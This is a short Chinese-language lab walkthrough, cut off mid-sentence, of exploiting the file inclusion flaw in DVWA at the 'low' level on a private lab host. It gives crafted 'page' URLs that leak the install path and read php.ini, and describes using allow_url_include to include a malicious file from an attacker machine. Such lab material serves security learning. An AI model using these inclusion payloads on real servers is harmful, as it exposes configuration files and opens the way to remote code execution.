low
查看源码,没有对参数page进行过滤
构造page尝试获取相应信息:http://192.168.56.141/vulnerabilities/fi/?page=1.php
暴出了路径
利用获取到的路径继续构造,尝试获取一些配置信息
http://192.168.56.141/vulnerabilities/fi/?page=C:\phpstudy_pro\WWW\DVWA-master\php.ini
关于的Magic_quote_gpc信息(出自https://www.freebuf.com/articles/web/119150.html)
查询手册,发现allow_url_fopen与allow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,可以利用这一点读取一个恶意文件,例如在攻击端http://192.168.56.132